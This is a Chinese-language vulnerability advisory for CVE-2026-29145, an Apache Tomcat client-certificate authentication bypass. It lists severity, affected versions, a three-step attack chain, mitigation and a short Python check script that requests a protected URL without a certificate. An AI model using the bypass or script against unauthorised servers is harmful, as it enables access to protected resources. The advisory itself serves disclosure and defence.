IPBUF安全漏洞报告
English
CVE-2026-29145 CVSS 9.1 严重

CVE-2026-29145 Apache Tomcat认证绕过漏洞

披露日期: 2026-04-09
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-29145
漏洞类型
认证绕过
CVSS评分
9.1 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Apache Tomcat, Apache Tomcat Native

相关标签

认证绕过Apache TomcatTLSRCE严重漏洞

漏洞概述

Apache Tomcat及Tomcat Native组件存在认证绕过漏洞。当禁用soft fail时,CLIENT_CERT认证未能按预期失败,导致攻击者可绕过验证,造成高机密性和完整性风险。

技术细节

该漏洞源于Apache Tomcat及其Native库在处理TLS客户端证书验证逻辑时的缺陷。当服务器配置强制要求客户端证书认证且禁用“soft fail”模式时,系统理应在验证失败时中断连接。然而受影响版本未能正确执行此逻辑,导致无效请求被错误接受。攻击者可发送无需证书的特制请求,利用此逻辑错误绕过强身份验证机制,从而访问受限资源或执行未授权操作。

攻击链分析

STEP 1
1. 信息收集
攻击者识别目标服务器使用的是受影响版本的Apache Tomcat或Tomcat Native库。
STEP 2
2. 发起攻击
攻击者向配置了CLIENT_CERT认证且禁用了soft fail的目标端点发送HTTPS请求,但不提供有效的客户端证书。
STEP 3
3. 绕过验证
由于漏洞存在,服务器未按预期拒绝连接,攻击者成功绕过身份验证,获取受保护资源的访问权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def check_vulnerability(target_url): """ PoC for CVE-2026-29145: Apache Tomcat Client Cert Auth Bypass Checks if the target allows access without a valid client certificate when 'soft fail' is disabled. """ try: response = requests.get(target_url, verify=False, timeout=10) if response.status_code == 200: print(f"[+] Potential Vulnerability Detected! Status: {response.status_code}") else: print(f"[-] Not vulnerable or protected. Status: {response.status_code}") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": target = "https://example-tomcat-server.com/protected" check_vulnerability(target)

影响范围

Apache Tomcat 11.0.0-M1 through 11.0.18
Apache Tomcat 10.1.0-M7 through 10.1.52
Apache Tomcat 9.0.83 through 9.0.115
Apache Tomcat Native 1.1.23 through 1.1.34
Apache Tomcat Native 1.2.0 through 1.2.39
Apache Tomcat Native 1.3.0 through 1.3.6
Apache Tomcat Native 2.0.0 through 2.0.13

防御指南

临时缓解措施
建议立即应用官方发布的安全补丁进行版本升级。在无法立即升级的情况下,应严格限制网络访问,仅允许信任的源IP地址访问受影响的Tomcat服务器,以减少被攻击的风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表